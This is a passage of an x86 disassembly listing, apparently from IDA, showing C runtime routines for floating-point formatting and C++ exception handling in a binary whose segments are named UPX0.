fstp [esp+18h+var_18]
call sub_4245E9
mov ebx, [esp+18h+arg_8]
mov esi, eax
push esi
mov eax, [esi+4]
add eax, ebx
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebp
push eax
call sub_424572
add esp, 14h
loc_421B48: ; CODE XREF: sub_421ADD+22�j
; sub_421ADD+39�j
cmp dword ptr [esi], 2Dh
mov edi, ebp
jnz short loc_421B56
mov byte ptr [ebp+0], 2Dh
lea edi, [ebp+1]
loc_421B56: ; CODE XREF: sub_421ADD+70�j
mov eax, [esi+4]
test eax, eax
jg short loc_421B6D
push 1
push edi
call sub_421CF1
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_421B6F
; ---------------------------------------------------------------------------
loc_421B6D: ; CODE XREF: sub_421ADD+7E�j
add edi, eax
loc_421B6F: ; CODE XREF: sub_421ADD+8E�j
test ebx, ebx
jle short loc_421BB4
push 1
push edi
call sub_421CF1
mov al, byte_43CBE8
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_421BB4
cmp ds:byte_4DB9F0, 0
jz short loc_421B99
neg esi
jmp short loc_421B9F
; ---------------------------------------------------------------------------
loc_421B99: ; CODE XREF: sub_421ADD+B6�j
neg esi
cmp ebx, esi
jl short loc_421BA1
loc_421B9F: ; CODE XREF: sub_421ADD+BA�j
mov ebx, esi
loc_421BA1: ; CODE XREF: sub_421ADD+C0�j
push ebx
push edi
call sub_421CF1
push ebx
push 30h
push edi
call sub_41B590
add esp, 14h
loc_421BB4: ; CODE XREF: sub_421ADD+94�j
; sub_421ADD+AD�j
pop edi
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_421ADD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421BBB proc near ; CODE XREF: sub_421CA0+34�p
var_14 = qword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [edi]
fstp [esp+14h+var_14]
call sub_4245E9
mov ds:dword_4DB9EC, eax
mov ecx, [eax+4]
dec ecx
mov ebx, [ebp+arg_8]
mov ds:dword_4DB9F4, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
push ebx
setz cl
add ecx, [ebp+arg_4]
mov esi, ecx
push esi
call sub_424572
mov eax, ds:dword_4DB9EC
add esp, 14h
mov ecx, [eax+4]
dec ecx
cmp ds:dword_4DB9F4, ecx
setl cl
mov ds:byte_4DB9F8, cl
mov eax, [eax+4]
dec eax
cmp eax, 0FFFFFFFCh
mov ds:dword_4DB9F4, eax
jl short loc_421C41
cmp eax, ebx
jge short loc_421C41
test cl, cl
jz short loc_421C32
loc_421C28: ; CODE XREF: sub_421BBB+72�j
mov al, [esi]
inc esi
test al, al
jnz short loc_421C28
and [esi-2], al
loc_421C32: ; CODE XREF: sub_421BBB+6B�j
push ebx
push [ebp+arg_4]
push edi
call sub_421C7D
add esp, 0Ch
jmp short loc_421C51
; ---------------------------------------------------------------------------
loc_421C41: ; CODE XREF: sub_421BBB+63�j
; sub_421BBB+67�j
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push edi
call sub_421C56
add esp, 10h
loc_421C51: ; CODE XREF: sub_421BBB+84�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_421BBB endp
; =============== S U B R O U T I N E =======================================
sub_421C56 proc near ; CODE XREF: sub_421BBB+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
mov ds:byte_4DB9F0, 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4219D9
and ds:byte_4DB9F0, 0
add esp, 10h
retn
sub_421C56 endp
; =============== S U B R O U T I N E =======================================
sub_421C7D proc near ; CODE XREF: sub_421BBB+7C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_8]
mov ds:byte_4DB9F0, 1
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_421ADD
and ds:byte_4DB9F0, 0
add esp, 0Ch
retn
sub_421C7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421CA0 proc near ; CODE XREF: sub_41F69F+3AA�p
; DATA XREF: sub_41C760�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_421CDB
cmp [ebp+arg_8], 45h
jz short loc_421CDB
cmp [ebp+arg_8], 66h
jnz short loc_421CC8
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_421ADD
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_421CC8: ; CODE XREF: sub_421CA0+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_421BBB
jmp short loc_421CEC
; ---------------------------------------------------------------------------
loc_421CDB: ; CODE XREF: sub_421CA0+7�j
; sub_421CA0+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4219D9
loc_421CEC: ; CODE XREF: sub_421CA0+39�j
add esp, 10h
pop ebp
retn
sub_421CA0 endp
; =============== S U B R O U T I N E =======================================
sub_421CF1 proc near ; CODE XREF: sub_4219D9+2C�p
; sub_421ADD+83�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_421D14
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_41AFE0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_41CC90
add esp, 10h
pop esi
loc_421D14: ; CODE XREF: sub_421CF1+7�j
pop edi
retn
sub_421CF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421D16 proc near ; CODE XREF: UPX0:0041C940�p
; sub_41C9A9+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_421D2C
call sub_4225B2
loc_421D2C: ; CODE XREF: sub_421D16+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_421D54
cmp dword ptr [esi+4], 0
jz short loc_421DAA
cmp [ebp+arg_14], 0
jnz short loc_421DAA
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_42205D
add esp, 10h
jmp short loc_421DAA
; ---------------------------------------------------------------------------
loc_421D54: ; CODE XREF: sub_421D16+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_421DAA
cmp dword ptr [eax], 0E06D7363h
jnz short loc_421D8E
cmp [eax+14h], edi
jbe short loc_421D8E
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_421D8E
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_421DAD
; ---------------------------------------------------------------------------
loc_421D8E: ; CODE XREF: sub_421D16+4A�j
; sub_421D16+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_421DB1
add esp, 20h
loc_421DAA: ; CODE XREF: sub_421D16+23�j
; sub_421D16+29�j ...
push 1
pop eax
loc_421DAD: ; CODE XREF: sub_421D16+76�j
pop edi
pop esi
pop ebp
retn
sub_421D16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421DB1 proc near ; CODE XREF: sub_421D16+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_421DD1
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_421DD6
loc_421DD1: ; CODE XREF: sub_421DB1+16�j
call sub_4225B2
loc_421DD6: ; CODE XREF: sub_421DB1+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_421F2D
cmp dword ptr [esi+10h], 3
jnz short loc_421E4A
cmp [esi+14h], edi
jnz short loc_421E4A
cmp dword ptr [esi+1Ch], 0
jnz short loc_421E4A
mov esi, ds:dword_4DB9FC
test esi, esi
jz loc_421F28
mov eax, ds:dword_4DBA00
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_424770
pop ecx
test eax, eax
pop ecx
jnz short loc_421E2C
call sub_4225B2
loc_421E2C: ; CODE XREF: sub_421DB1+74�j
cmp [esi], ebx
jnz loc_421F2D
cmp dword ptr [esi+10h], 3
jnz short loc_421E4A
cmp [esi+14h], edi
jnz short loc_421E4A
cmp dword ptr [esi+1Ch], 0
jnz short loc_421E4A
call sub_4225B2
loc_421E4A: ; CODE XREF: sub_421DB1+41�j
; sub_421DB1+46�j ...
cmp [esi], ebx
jnz loc_421F2D
cmp dword ptr [esi+10h], 3
jnz loc_421F2D
cmp [esi+14h], edi
jnz loc_421F2D
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_41CAF7
add esp, 14h
mov ebx, eax
loc_421E81: ; CODE XREF: sub_421DB1+162�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_421F18
cmp [ebx], edi
jg short loc_421F0D
cmp edi, [ebx+4]
jg short loc_421F0D
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_421F0A
loc_421EA6: ; CODE XREF: sub_421DB1+131�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_421ED7
loc_421EB8: ; CODE XREF: sub_421DB1+124�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_422000
add esp, 0Ch
test eax, eax
jnz short loc_421EE6
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_421EB8
loc_421ED7: ; CODE XREF: sub_421DB1+105�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_421EA6
jmp short loc_421F0A
; ---------------------------------------------------------------------------
loc_421EE6: ; CODE XREF: sub_421DB1+119�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_422111
add esp, 2Ch
loc_421F0A: ; CODE XREF: sub_421DB1+F3�j
; sub_421DB1+133�j
mov edi, [ebp+var_10]
loc_421F0D: ; CODE XREF: sub_421DB1+DE�j
; sub_421DB1+E3�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_421E81
; ---------------------------------------------------------------------------
loc_421F18: ; CODE XREF: sub_421DB1+D6�j
cmp [ebp+arg_14], 0
jz short loc_421F28
push 1
push esi
call sub_422486
pop ecx
pop ecx
loc_421F28: ; CODE XREF: sub_421DB1+56�j
; sub_421DB1+16B�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_421F2D: ; CODE XREF: sub_421DB1+37�j
; sub_421DB1+7D�j ...
cmp [ebp+arg_14], 0
jnz short loc_421F53
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_421F58
add esp, 20h
jmp short loc_421F28
; ---------------------------------------------------------------------------
loc_421F53: ; CODE XREF: sub_421DB1+180�j
jmp sub_42255C
sub_421DB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421F58 proc near ; CODE XREF: sub_421DB1+198�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
cmp ds:dword_4DBA04, 0
push esi
push edi
jz short loc_421F89
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41C9CE
add esp, 1Ch
test eax, eax
jnz short loc_421FFC
loc_421F89: ; CODE XREF: sub_421F58+E�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_41CAF7
add esp, 14h
mov esi, eax
loc_421FA5: ; CODE XREF: sub_421F58+A2�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_421FFC
cmp edi, [esi]
jl short loc_421FF4
cmp edi, [esi+4]
jg short loc_421FF4
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_421FCE
cmp byte ptr [ecx+8], 0
jnz short loc_421FF4
loc_421FCE: ; CODE XREF: sub_421F58+6E�j
push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_422111
add esp, 2Ch
loc_421FF4: ; CODE XREF: sub_421F58+57�j
; sub_421F58+5C�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_421FA5
; ---------------------------------------------------------------------------
loc_421FFC: ; CODE XREF: sub_421F58+2F�j
; sub_421F58+53�j
pop edi
pop esi
leave
retn
sub_421F58 endp
; =============== S U B R O U T I N E =======================================
sub_422000 proc near ; CODE XREF: sub_421DB1+10F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_422057
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_422057
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_422031
add ecx, 8
push ecx
push edx
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_422053
loc_422031: ; CODE XREF: sub_422000+1F�j
test byte ptr [esi], 2
jz short loc_42203B
test byte ptr [edi], 8
jz short loc_422053
loc_42203B: ; CODE XREF: sub_422000+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_42204A
test byte ptr [edi], 1
jz short loc_422053
loc_42204A: ; CODE XREF: sub_422000+43�j
test al, 2
jz short loc_422057
test byte ptr [edi], 2
jnz short loc_422057
loc_422053: ; CODE XREF: sub_422000+2F�j
; sub_422000+39�j ...
xor eax, eax
jmp short loc_42205A
; ---------------------------------------------------------------------------
loc_422057: ; CODE XREF: sub_422000+B�j
; sub_422000+14�j ...
push 1
pop eax
loc_42205A: ; CODE XREF: sub_422000+55�j
pop edi
pop esi
retn
sub_422000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42205D proc near ; CODE XREF: sub_421D16+34�p
; sub_422111+42�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4278C0
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_42208F: ; CODE XREF: sub_42205D+8A�j
cmp esi, [ebp+arg_C]
jz short loc_4220E9
cmp esi, 0FFFFFFFFh
jle short loc_42209E
cmp esi, [edi+4]
jl short loc_4220A3
loc_42209E: ; CODE XREF: sub_42205D+3A�j
call sub_4225B2
loc_4220A3: ; CODE XREF: sub_42205D+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_4220BE
push 103h
push ebx
push eax
call sub_422510
loc_4220BE: ; CODE XREF: sub_42205D+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4220DE
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_4220FB
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_4220DE: ; CODE XREF: sub_42205D+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_42208F
; ---------------------------------------------------------------------------
loc_4220E9: ; CODE XREF: sub_42205D+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_42205D endp
; =============== S U B R O U T I N E =======================================
sub_4220FB proc near ; CODE XREF: sub_42205D+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_42210C
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42210C: ; CODE XREF: sub_4220FB+C�j
jmp sub_42255C
sub_4220FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422111 proc near ; CODE XREF: sub_421DB1+151�p
; sub_421F58+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_422133
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_4222C2
add esp, 10h
loc_422133: ; CODE XREF: sub_422111+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_42213F
push edi
jmp short loc_422142
; ---------------------------------------------------------------------------
loc_42213F: ; CODE XREF: sub_422111+29�j
push [ebp+arg_24]
loc_422142: ; CODE XREF: sub_422111+2C�j
call sub_41C8D0
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_42205D
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_42218C
add esp, 2Ch
test eax, eax
jz short loc_422187
push edi
push eax
call sub_41C88E
loc_422187: ; CODE XREF: sub_422111+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_422111 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42218C proc near ; CODE XREF: sub_422111+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4278D0
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_10]
mov [ebp+var_2C], eax
xor ebx, ebx
mov [ebp+var_24], ebx
mov esi, [ebp+arg_4]
mov ecx, [esi-4]
mov [ebp+var_28], ecx
mov ecx, ds:dword_4DB9FC
mov [ebp+var_1C], ecx
mov ecx, ds:dword_4DBA00
mov [ebp+var_20], ecx
mov edi, [ebp+arg_0]
mov ds:dword_4DB9FC, edi
mov ecx, [ebp+arg_8]
mov ds:dword_4DBA00, ecx
mov [ebp+var_4], ebx
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push esi
call sub_41C955
add esp, 14h
mov [ebp+var_2C], eax
mov [ebp+var_4], ebx
or [ebp+var_4], 0FFFFFFFFh
call sub_422252
mov eax, [ebp+var_2C]
loc_422219: ; CODE XREF: sub_422232+16�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_42218C endp
; =============== S U B R O U T I N E =======================================
sub_422228 proc near ; DATA XREF: UPX0:004278E0�o
push dword ptr [ebp-14h]
call sub_422298
pop ecx
retn
sub_422228 endp
; =============== S U B R O U T I N E =======================================
sub_422232 proc near ; DATA XREF: UPX0:004278E4�o
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_41CBB6
pop ecx
pop ecx
xor eax, eax
jmp short loc_422219
sub_422232 endp
; ---------------------------------------------------------------------------
loc_42224A: ; DATA XREF: UPX0:004278D8�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
; =============== S U B R O U T I N E =======================================
sub_422252 proc near ; CODE XREF: sub_42218C+85�p
mov eax, [ebp-28h]
mov [esi-4], eax
mov eax, [ebp-1Ch]
mov ds:dword_4DB9FC, eax
mov eax, [ebp-20h]
mov ds:dword_4DBA00, eax
cmp dword ptr [edi], 0E06D7363h
jnz short locret_422297
cmp dword ptr [edi+10h], 3
jnz short locret_422297
cmp dword ptr [edi+14h], 19930520h
jnz short locret_422297
cmp [ebp-24h], ebx
jnz short locret_422297
cmp [ebp-2Ch], ebx
jz short locret_422297
call sub_41CC1E
push eax
push edi
call sub_422486
pop ecx
pop ecx
locret_422297: ; CODE XREF: sub_422252+1C�j
; sub_422252+22�j ...
retn
sub_422252 endp
; =============== S U B R O U T I N E =======================================
sub_422298 proc near ; CODE XREF: sub_422228+3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_4222BF
cmp dword ptr [eax+10h], 3
jnz short loc_4222BF
cmp dword ptr [eax+14h], 19930520h
jnz short loc_4222BF
cmp dword ptr [eax+1Ch], 0
jnz short loc_4222BF
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_4222BF: ; CODE XREF: sub_422298+C�j
; sub_422298+12�j ...
xor eax, eax
retn
sub_422298 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4222C2 proc near ; CODE XREF: sub_422111+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4278E8
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_42246B
cmp byte ptr [eax+8], 0
jz loc_42246B
mov eax, [ecx+8]
test eax, eax
jz loc_42246B
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_42235F
mov esi, [ebp+arg_0]
push 1
push dword ptr [esi+18h]
call sub_424770
pop ecx
pop ecx
test eax, eax
jz loc_422462
push 1
push edi
call sub_42478C
pop ecx
pop ecx
test eax, eax
jz loc_422462
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_422350: ; CODE XREF: sub_4222C2+F5�j
push eax
call sub_4224ED
pop ecx
pop ecx
mov [edi], eax
jmp loc_422467
; ---------------------------------------------------------------------------
loc_42235F: ; CODE XREF: sub_4222C2+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_4223B9
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
call sub_424770
pop ecx
pop ecx
test eax, eax
jz loc_422462
push 1
push edi
call sub_42478C
pop ecx
pop ecx
test eax, eax
jz loc_422462
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_41CC90
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_422467
mov eax, [edi]
test eax, eax
jz loc_422467
add esi, 8
push esi
jmp short loc_422350
; ---------------------------------------------------------------------------
loc_4223B9: ; CODE XREF: sub_4222C2+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
jnz short loc_422401
call sub_424770
pop ecx
pop ecx
test eax, eax
jz loc_422462
push 1
push edi
call sub_42478C
pop ecx
pop ecx
test eax, eax
jz short loc_422462
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_4224ED
pop ecx
pop ecx
push eax
push edi
call sub_41CC90
add esp, 0Ch
jmp short loc_422467
; ---------------------------------------------------------------------------
loc_422401: ; CODE XREF: sub_4222C2+103�j
call sub_424770
pop ecx
pop ecx
test eax, eax
jz short loc_422462
push 1
push edi
call sub_42478C
pop ecx
pop ecx
test eax, eax
jz short loc_422462
push dword ptr [esi+18h]
call sub_4247A8
pop ecx
test eax, eax
jz short loc_422462
test byte ptr [esi], 4
jz short loc_422448
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_4224ED
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_41C8C9
jmp short loc_422467
; ---------------------------------------------------------------------------
loc_422448: ; CODE XREF: sub_4222C2+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_4224ED
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_41C8C2
jmp short loc_422467
; ---------------------------------------------------------------------------
loc_422462: ; CODE XREF: sub_4222C2+6A�j
; sub_4222C2+7C�j ...
call sub_4225B2
loc_422467: ; CODE XREF: sub_4222C2+98�j
; sub_4222C2+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_42246B: ; CODE XREF: sub_4222C2+2E�j
; sub_4222C2+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4222C2 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_42255C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422486 proc near ; CODE XREF: sub_421DB1+170�p
; sub_422252+3E�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4278F8
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_4224CD
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_4224CD
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_41C8C2
or [ebp+var_4], 0FFFFFFFFh
loc_4224CD: ; CODE XREF: sub_422486+2A�j
; sub_422486+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_422486 endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_42255C
; =============== S U B R O U T I N E =======================================
sub_4224ED proc near ; CODE XREF: sub_4222C2+8F�p
; sub_4222C2+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
